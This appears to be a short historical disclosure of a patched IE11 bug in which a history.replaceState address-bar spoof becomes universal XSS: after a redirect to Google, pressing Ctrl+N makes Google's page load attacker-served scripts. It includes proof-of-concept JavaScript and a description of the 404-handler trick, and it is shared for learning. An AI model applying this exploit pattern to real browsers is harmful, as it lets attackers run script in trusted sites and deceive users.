The history.replaceState address bar spoof had been patched for IE10, but it still worked on IE11. What made this variation more interesting is that it turned a simple spoof into a UXSS: after loading Google with an attacker-controlled URL still showing in the address bar, pressing Ctrl+N opens a new window that duplicates the current tab — but loads resources (including scripts) from the attacker’s domain rather than Google’s.

// Attacker-hosted page (file name not given in the original notes).
function main() {
    // Rewrite the address bar entry to the relative URL redir.php without navigating.
    history.replaceState("", "", "redir.php");
    // Reloading fetches redir.php, which redirects to google.com; on IE11 the
    // address bar keeps showing the attacker's URL instead of Google's.
    location.reload();
}
main();

// trick.js (served by the attacker's 404 handler and loaded by the spoofed
// new window in place of Google's own script; see below)
alert(document.body.innerText);

Once redir.php redirects to Google and the address bar still shows the attacker’s URL, pressing Ctrl+N opens a new window whose HTML is a copy of Google’s page but whose relative script references resolve to the attacker’s server. Google loads a different random script name each time, so the server’s 404 handler can always serve trick.js regardless of the requested filename. User interaction (Ctrl+N) is required. Tested on Win7 IE11 build 20130227-2100.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.